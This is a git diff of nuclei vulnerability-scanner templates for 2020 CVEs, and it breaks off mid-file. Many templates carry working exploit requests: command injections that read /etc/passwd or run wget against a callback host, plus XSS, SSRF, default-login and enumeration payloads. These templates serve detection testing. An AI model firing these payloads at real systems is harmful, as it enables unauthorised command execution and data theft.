a/nuclei-templates/CVE-2020/cve-2020-21224.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2020-21224 - -info: - name: Inspur ClusterEngine V4.0 RCE - author: pikpikcu - severity: critical - description: A Remote Code Execution vulnerability has been found in Inspur ClusterEngine V4.0. A remote attacker can send a malicious login packet to the control server - reference: https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul - tags: cve,cve2020,clusterengine,rce - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-21224 - cwe-id: CWE-88 - -requests: - - method: POST - path: - - "{{BaseURL}}/login" - headers: - Content-Type: application/x-www-form-urlencoded - Referer: "{{Hostname}}/module/login/login.html" - - body: | - op=login&username=;`cat /etc/passwd`&password= - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - part: body - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-2140.yaml b/nuclei-templates/CVE-2020/cve-2020-2140.yaml new file mode 100644 index 0000000000..541cf80516 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-2140.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-2140 +info: + author: j3ssie/geraldino2 + name: Jenkin Audit Trail Plugin XSS + severity: medium + description: Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability. + reference: https://www.jenkins.io/security/advisory/2020-03-09/ + tags: cve,cve2020,jenkins,xss,plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-2140 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample" + - "{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample" + + matchers-condition: and + matchers: + - type: word + words: + -

    sample + part: body + + - type: word + words: + - "text/html" + part: header + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/74cms-sqli-8.yaml b/nuclei-templates/CVE-2020/cve-2020-22210.yaml similarity index 100% rename from nuclei-templates/Other/74cms-sqli-8.yaml rename to nuclei-templates/CVE-2020/cve-2020-22210.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-22840.yaml b/nuclei-templates/CVE-2020/cve-2020-22840.yaml deleted file mode 100644 index 24f34dd46a..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-22840.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2020-22840 - -info: - name: b2evolution CMS Open redirect - author: geeknik - severity: medium - description: Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in email_passthrough.php. - tags: cve,cve2020,redirect,b2evolution - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-22840 - cwe-id: CWE-601 - reference: - - https://github.com/b2evolution/b2evolution/issues/102 - - http://packetstormsecurity.com/files/161362/b2evolution-CMS-6.11.6-Open-Redirection.html - - https://www.exploit-db.com/exploits/49554 - -requests: - - method: GET - path: - - "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com" - - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' - part: header diff --git a/nuclei-templates/CVE-2020/cve-2020-23517.yaml b/nuclei-templates/CVE-2020/cve-2020-23517.yaml deleted file mode 100644 index ddd98b74b9..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-23517.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2020-23517 - -info: - name: Aryanic HighMail (High CMS) XSS - author: geeknik - severity: medium - description: XSS vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm. - reference: https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html - tags: xss,cve,cve2020 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-23517 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - "{{BaseURL}}/login/?uid=\">" - - matchers-condition: and - matchers: - - type: word - words: - - text/html - part: header - - type: word - words: - - "' + part: body + - type: word + words: + - "text/html" + part: header \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-24550.yaml b/nuclei-templates/CVE-2020/cve-2020-24550.yaml deleted file mode 100644 index 7634783769..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-24550.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2020-24550 - -info: - name: CVE-2020-24550 - author: dhiyaneshDK - severity: medium - description: An Open Redirect vulnerability in EpiServer Find before 13.2.7 allows an attacker to redirect users to untrusted websites via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL. - tags: cve,cve2020,redirect,episerver - reference: https://labs.nettitude.com/blog/cve-2020-24550-open-redirect-in-episerver-find/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-24550 - cwe-id: CWE-601 - -requests: - - method: GET - - path: - - '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com' - - matchers-condition: and - matchers: - - type: word - words: - - "Location: https://example.com" - part: header - - type: status - status: - - 301 diff --git a/nuclei-templates/CVE-2020/cve-2020-24579.yaml b/nuclei-templates/CVE-2020/cve-2020-24579.yaml new file mode 100644 index 0000000000..b998f77f13 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-24579.yaml @@ -0,0 +1,40 @@ +id: CVE-2020-24579 + +info: + name: DLINK DSL 2888a RCE + author: pikpikcu + severity: high + description: An issue was discovered on D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality. + reference: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/ + tags: cve,cve2020,dlink,rce + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-24579 + cwe-id: CWE-287 + +requests: + - raw: + - | # Response:Location: /page/login/login_fail.html + POST / HTTP/1.1 + Host: {{Hostname}} + Cookie: uid=6gPjT2ipmNz + + username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b + + - | # Get /etc/passwd + GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1 + Host: {{Hostname}} + Cookie: uid=6gPjT2ipmNz + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + regex: + - "nobody:[x*]:65534:65534" + - "root:.*:0:0" + condition: or diff --git a/nuclei-templates/CVE-2020/CVE-2020-24609.yaml b/nuclei-templates/CVE-2020/cve-2020-24609.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-24609.yaml rename to nuclei-templates/CVE-2020/cve-2020-24609.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-24912.yaml b/nuclei-templates/CVE-2020/cve-2020-24912.yaml deleted file mode 100644 index aacac10ef1..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-24912.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2020-24912 - -info: - name: QCube Cross-Site-Scripting - author: pikpikcu - severity: medium - description: A reflected cross-site scripting (XSS) vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users. - reference: - - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03 - - https://nvd.nist.gov/vuln/detail/CVE-2020-24912 - - http://seclists.org/fulldisclosure/2021/Mar/30 - tags: cve,cve2020,qcubed,xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-24912 - cwe-id: CWE-79 - -requests: - - method: POST - path: - - "{{BaseURL}}/assets/_core/php/profile.php" - - "{{BaseURL}}/assets/php/profile.php" - - "{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php" - headers: - Content-Type: application/x-www-form-urlencoded - body: "intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=" - - matchers-condition: and - matchers: - - - type: word - words: - - "" - part: body - - - type: word - words: - - 'Content-Type: text/html' - part: header diff --git a/nuclei-templates/CVE-2020/cve-2020-24949.yaml b/nuclei-templates/CVE-2020/cve-2020-24949.yaml new file mode 100644 index 0000000000..58d1536129 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-24949.yaml @@ -0,0 +1,30 @@ +id: CVE-2020-24949 + +info: + name: PHPFusion 9.03.50 Remote Code Execution + author: geeknik + severity: high + description: Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE). + reference: https://packetstormsecurity.com/files/162852/phpfusion90350-exec.txt + tags: cve,cve2020,phpfusion,rce,php + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-24949 + +requests: + - method: GET + path: + - "{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(ls)}" + + matchers-condition: and + matchers: + + - type: status + status: + - 200 + + - type: word + part: body + words: + - "infusion_db.php" \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-25223.yaml b/nuclei-templates/CVE-2020/cve-2020-25223.yaml new file mode 100644 index 0000000000..3e1e320fe2 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-25223.yaml @@ -0,0 +1,40 @@ +id: CVE-2020-25223 + +info: + name: Sophos UTM - Preauth RCE + author: gy741 + severity: critical + description: A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 MR5, v9.607 MR7, and v9.511 MR11 + reference: + - https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223 + tags: cve,cve2020,sophos,rce,oast + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-25223 + +requests: + - raw: + - | + POST /var HTTP/1.1 + Host: {{Hostname}} + Accept: text/javascript, text/html, application/xml, text/xml, */* + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + X-Requested-With: XMLHttpRequest + X-Prototype-Version: 1.5.1.1 + Content-Type: application/json; charset=UTF-8 + Origin: {{BaseURL}} + Connection: close + Referer: {{BaseURL}} + Sec-Fetch-Dest: empty + Sec-Fetch-Mode: cors + Sec-Fetch-Site: same-origin + + {"objs": [{"FID": "init"}], "SID": "|wget http://{{interactsh-url}}|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true} + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/nuclei-templates/CVE-2020/cve-2020-25495.yaml b/nuclei-templates/CVE-2020/cve-2020-25495.yaml deleted file mode 100644 index 5a82ebb9c1..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-25495.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2020-25495 - -info: - name: SCO Openserver 5.0.7 - 'section' Reflected XSS - author: 0x_Akoko - description: A reflected Cross-site scripting (XSS) vulnerability in Xinuo (formerly SCO) Openserver version 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section'. - severity: medium - tags: cve,cve2020,sco,xss - reference: https://www.exploit-db.com/exploits/49300 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-25495 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - '{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "

    hello

    " - part: body - - - type: word - words: - - "text/html" - part: header diff --git a/nuclei-templates/CVE-2020/cve-2020-25540.yaml b/nuclei-templates/CVE-2020/cve-2020-25540.yaml deleted file mode 100644 index 2ff12bd0ef..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-25540.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2020-25540 -info: - - name: ThinkAdmin 6 - Arbitrarily File Read (CVE-2020-25540) - author: geeknik - severity: high - description: ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter. - reference: https://www.exploit-db.com/exploits/48812 - tags: cve,cve2020,thinkadmin,lfi - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2020-25540 - cwe-id: CWE-22 - -requests: - - method: GET - path: - - '{{BaseURL}}/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" diff --git a/nuclei-templates/CVE-2020/cve-2020-26413.yaml b/nuclei-templates/CVE-2020/cve-2020-26413.yaml new file mode 100644 index 0000000000..8aeff846b2 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-26413.yaml @@ -0,0 +1,50 @@ +id: CVE-2020-26413 + +info: + name: Gitlab User enumeration via Graphql API + author: _0xf4n9x_,pikpikcu + severity: medium + description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.4 before 13.6.2. Information disclosure via GraphQL results in user email being unexpectedly visible. + reference: + - https://gitlab.com/gitlab-org/gitlab/-/issues/244275 + - https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json + - https://nvd.nist.gov/vuln/detail/CVE-2020-26413 + tags: cve,cve2020,gitlab,exposure,enum,graphql + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-26413 + cwe-id: CWE-200 + +requests: + - raw: + - | + POST /api/graphql HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "query": "{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }", + "variables": null, + "operationName": null + } + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"username":' + - '"avatarUrl":' + - '"node":' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: json + part: body + json: + - '.data.users.edges[].node.email' diff --git a/nuclei-templates/CVE-2020/cve-2020-26919.yaml b/nuclei-templates/CVE-2020/cve-2020-26919.yaml new file mode 100644 index 0000000000..a57eaa9237 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-26919.yaml @@ -0,0 +1,30 @@ +id: CVE-2020-26919 + +info: + name: NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution + author: gy741 + severity: critical + description: NETGEAR ProSAFE Plus was found to allow any HTML page as a valid endpoint to submit POST requests, allowing debug action via the submitId and debugCmd parameters. The problem is publicly exposed in the login.html webpage, which has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow attackers to execute system commands. + reference: + - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/ + - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ + tags: cve,cve2020,netgear,rce,oast + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-26919 + +requests: + - raw: + - | + POST /login.htm HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + submitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd= + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/nuclei-templates/CVE-2020/cve-2020-26948.yaml b/nuclei-templates/CVE-2020/cve-2020-26948.yaml deleted file mode 100644 index 6367027877..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-26948.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2020-26948 - -info: - name: Emby Server SSRF - author: dwisiswant0 - severity: critical - reference: https://github.com/btnz-k/emby_ssrf - description: Emby Server before 4.5.0 allows SSRF via the Items/RemoteSearch/Image ImageURL parameter. - tags: cve,cve2020,emby,jellyfin,ssrf - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-26948 - cwe-id: CWE-918 - -requests: - - method: GET - path: - - "{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net" - matchers-condition: and - matchers: - - type: status - status: - - 500 - - type: word - words: - - "Name or service not known" - part: body - - type: word - words: - - "text/plain" - part: header diff --git a/nuclei-templates/CVE-2020/cve-2020-27361.yaml b/nuclei-templates/CVE-2020/cve-2020-27361.yaml new file mode 100644 index 0000000000..800de254e4 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-27361.yaml @@ -0,0 +1,31 @@ +id: CVE-2020-27361 + +info: + name: Akkadian Provisioning Manager - Files Listing + author: gy741 + severity: high + description: An issue exists within Akkadian Provisioning Manager 4.50.02 which allows attackers to view sensitive information within the /pme subdirectories. + reference: https://www.blacklanternsecurity.com/2021-07-01-Akkadian-CVE/ + tags: cve,cve2020,akkadian,listing,exposure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-27361 + cwe-id: CWE-668 + +requests: + - method: GET + path: + - "{{BaseURL}}/pme/media/" + + matchers-condition: and + matchers: + - type: word + words: + - "Index of /pme/media" + - "Parent Directory" + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-27735.yaml b/nuclei-templates/CVE-2020/cve-2020-27735.yaml deleted file mode 100644 index dc84ec8031..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-27735.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2020-27735 - -info: - name: Wing FTP's Web Interface XSS - author: pikpikcu - severity: medium - description: | - An XSS issue was discovered in Wing FTP 6.4.4. An arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser. - reference: https://nvd.nist.gov/vuln/detail/CVE-2020-27735 - tags: cve,cve2020,xss,wing-ftp - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-27735 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - "{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)" - - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - - type: status - status: - - 200 - - - type: word - part: header - words: - - text/html diff --git a/nuclei-templates/CVE-2020/cve-2020-27982.yaml b/nuclei-templates/CVE-2020/cve-2020-27982.yaml new file mode 100644 index 0000000000..f46b932a44 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-27982.yaml @@ -0,0 +1,34 @@ +id: CVE-2020-27982 +info: + name: IceWarp WebMail Reflected XSS + author: madrobot + severity: medium + description: IceWarp 11.4.5.0 allows XSS via the language parameter. + reference: https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html + tags: cve,cve2020,xss,icewarp + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-27982 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "" + part: body + + - type: word + words: + - "text/html" + part: header \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-28188.yaml b/nuclei-templates/CVE-2020/cve-2020-28188.yaml new file mode 100644 index 0000000000..4fac70ed9a --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-28188.yaml @@ -0,0 +1,33 @@ +id: CVE-2020-28188 + +info: + name: TerraMaster TOS - Unauthenticated Remote Command Execution + author: gy741 + severity: critical + description: Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php in Event parameter. + reference: + - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ + - https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html + - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ + tags: cve,cve2020,terramaster,rce,oast,mirai + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-28188 + cwe-id: CWE-78 + +requests: + - raw: + - | + GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1 + Host: {{Hostname}} + + - | + GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/nuclei-templates/CVE-2020/cve-2020-28208.yaml b/nuclei-templates/CVE-2020/cve-2020-28208.yaml new file mode 100644 index 0000000000..5e34ccde4a --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-28208.yaml @@ -0,0 +1,36 @@ +id: CVE-2020-28208 + +info: + name: RocketChat Unauthenticated Email enumeration + author: pdteam + severity: medium + description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1. + reference: https://trovent.io/security-advisory-2010-01 + tags: cve,cve2020,rocketchat + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-28208 + cwe-id: CWE-203 + +requests: + - raw: + - | + POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/json + + {"message":"{\"msg\":\"method\",\"method\":\"sendForgotPasswordEmail\",\"params\":[\"user@local.email\"],\"id\":\"3\"}"} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - '"result\":false' + - '"success":true' + part: body + condition: and diff --git a/nuclei-templates/CVE-2020/cve-2020-35234.yaml b/nuclei-templates/CVE-2020/cve-2020-35234.yaml new file mode 100644 index 0000000000..9628bcfd78 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-35234.yaml @@ -0,0 +1,45 @@ +id: CVE-2020-35234 + +info: + name: SMTP WP Plugin Directory Listing + author: PR3R00T + severity: high + description: The WordPress Easy WP SMTP Plugin has its log folder remotely accessible and its content available for access. + impact: | + Low: Information disclosure + remediation: Upgrade to version 1.4.3 or newer and consider disabling debug logs. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-35234 + - https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/ + - https://wordpress.org/plugins/easy-wp-smtp/#developers + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-35234 + cwe-id: CWE-532 + epss-score: 0.37649 + epss-percentile: 0.97105 + cpe: cpe:2.3:a:wp-ecommerce:easy_wp_smtp:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: wp-ecommerce + product: easy_wp_smtp + framework: wordpress + tags: cve2020,cve,wordpress,wp-plugin,smtp,wp-ecommerce + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/" + - "{{BaseURL}}/wp-content/plugins/wp-mail-smtp-pro/" + + matchers: + - type: word + words: + - "debug" + - "log" + - "Index of" + condition: and +# digest: 4a0a00473045022100b5b245278cf9f882c12ccd7f432d9ad044ce3e1d7d1040268987c3b0da6b38dc02206edf464d73fbe6176784b8e1f637bf87e468ab8a348d61afba6779c4abe0d4d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-35338.yaml b/nuclei-templates/CVE-2020/cve-2020-35338.yaml deleted file mode 100644 index 205fad22a0..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-35338.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2020-35338 - -info: - author: Jeya Seelan - severity: critical - name: Default Credentials of WMT Server - description: The Web Administrative Interface in Mobile Viewpoint Wireless Multiplex Terminal (WMT) Playout Server 20.2.8 and earlier has a default account with a password of pokon. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-35338 - - https://jeyaseelans.medium.com/cve-2020-35338-9e841f48defa - tags: cve,cve2020,wmt,default-login - - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-35338 - cwe-id: CWE-798 -requests: - - method: GET - path: - - "{{BaseURL}}/server/" - headers: - Authorization: "Basic OnBva29u" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "WMT Server playout" \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-35713.yaml b/nuclei-templates/CVE-2020/cve-2020-35713.yaml deleted file mode 100644 index 36714819c0..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-35713.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2020-35713 - -info: - name: Linksys RE6500 Pre-Auth RCE - author: gy741 - severity: critical - reference: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html - description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. - tags: cve,cve2020,linksys,rce,oast,router - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-35713 - cwe-id: CWE-78 - -requests: - - raw: - - | - POST /goform/setSysAdm HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Origin: {{BaseURL}} - Referer: {{BaseURL}}/login.shtml - - admuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1 - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/nuclei-templates/CVE-2020/CVE-2020-3952.yaml b/nuclei-templates/CVE-2020/cve-2020-3952.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-3952.yaml rename to nuclei-templates/CVE-2020/cve-2020-3952.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-4038.yaml b/nuclei-templates/CVE-2020/cve-2020-4038.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-4038.yaml rename to nuclei-templates/CVE-2020/cve-2020-4038.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-4463.yaml b/nuclei-templates/CVE-2020/cve-2020-4463.yaml new file mode 100644 index 0000000000..5b474dffa6 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-4463.yaml @@ -0,0 +1,45 @@ +id: CVE-2020-4463 + +info: + name: IBM Maximo Asset Management Information Disclosure via XXE + author: dwisiswant0 + severity: high + description: | + IBM Maximo Asset Management is vulnerable to an + XML External Entity Injection (XXE) attack when processing XML data. + A remote attacker could exploit this vulnerability to expose + sensitive information or consume memory resources. + + reference: + - https://www.ibm.com/support/pages/security-bulletin-ibm-maximo-asset-management-vulnerable-information-disclosure-cve-2020-4463 + - 